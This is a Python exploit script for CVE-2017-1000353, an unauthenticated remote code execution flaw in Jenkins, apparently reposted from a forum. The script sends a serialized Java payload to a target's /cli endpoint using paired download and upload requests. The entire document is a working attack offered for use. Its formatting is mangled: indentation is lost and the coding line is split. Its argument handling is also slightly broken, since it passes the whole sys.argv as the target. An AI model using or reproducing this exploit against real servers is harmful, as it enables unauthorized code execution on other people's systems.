Jenkins Unauthenticated Remote Code Execution
#!/usr/bin/env python#
-*- coding: utf-8 -*-
#
CVE-2017-1000353
#
Author: f0rsaken
import requests
import sys
import threading
import time
import uuid
PREAMBLE = "<======>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\x00\x00\x00\x00"
SER = open("Payload.ser", "rb").read()
SESSION = str(uuid.uuid4())
def download(url, session):
headers = {"Side": "download", "Session": session}
try:
r = requests.post(url, headers=headers, timeout=5)
except requests.RequestException as e:
pass
def upload(url, session, data):
headers = {"Side": "upload", "Session": session}
r = requests.post(url, data=data, headers=headers, timeout=5)
def exploit(target):
URL = "http://" + target + "/cli"
threading.Thread(target=download, args=(URL, SESSION)).start()
time.sleep(1.0)
try:
upload(URL, SESSION, PREAMBLE+SER)
except requests.RequestException as e:
return False
else:
return target
def main():
try:
target = sys.argv
except IndexError as e:
print("Jenkins Unauthenticated Remote Code Execution")
else:
result = exploit(target)
print(result)
if __name__ == "__main__":
main()
页:
[1]